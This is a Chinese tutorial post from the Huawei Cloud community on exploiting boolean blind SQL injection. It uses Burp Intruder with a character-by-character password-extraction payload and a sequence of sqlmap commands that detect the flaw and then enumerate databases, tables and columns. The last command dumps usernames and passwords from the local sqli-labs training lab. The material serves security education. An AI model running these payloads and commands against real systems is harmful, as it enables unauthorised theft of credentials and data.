【工具跑SQL盲注】

举报
黑色地带(崛起) 发表于 2023/02/19 17:02:29 2023/02/19
【摘要】 【工具跑SQL盲注】

【工具跑SQL盲注】

 目录

一、(工具)burp跑盲注

1.1、方法一:爆破

1.2、方法二:注入语句爆破

二、(工具)sqlmap跑布尔盲注

2.1、命令:

2.2、利用过程:

第一步:检测是否存在注入

 第二步:爆数据库名

 第三步:爆数据库表名

 第四步:爆字段名

 第五步:爆数据

 三、推荐




一、(工具)burp跑盲注

1.1、方法一:爆破


抓包之后,将请求发送到"Intruder"模块

编辑


设置2个有效载荷

 编辑


编辑


1.2、方法二:注入语句爆破

注入构造语句,进行迭代操作

(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)




二、(工具)sqlmap跑布尔盲注

2.1、命令:

-u 指定注入点

--dbs 跑库 名

--tables 跑表 名

--columns 跑字段 名

--dump 枚举数据

跑出对应的后,依次加上-D 指定库 -T 指定表 -C 指定字段


2.2、利用过程:

第一步:检测是否存在注入

基础操作

python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch

--batch是使用默认设置

编辑



编辑


其实环境都扫出来了 

就可以再加上--dbms mysql了


 第二步:爆数据库名

命令

#获取全部数据库

sqlmap.py -u url --dbs --batch

---------

#获取当前数据库

sqlmap.py -u url --current-dbs --batch


基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch

编辑


 编辑


 第三步:爆数据库表名

命令

python sqlmap.py -u url -D DB --tables --batch


基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch

编辑


 编辑


 第四步:爆字段名

命令:

sqlmap.py -u url -D DB -T TBL --columns --batch


基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch

编辑


编辑


 第五步:爆数据

命令:

sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch


基础操作:

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch

编辑


 编辑



 三、推荐

【SQL注入-无回显】布尔盲注:原理、函数、利用过程

【SQL注入-有回显】DNS请求注入:原理、平台、使用过程、配置




【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。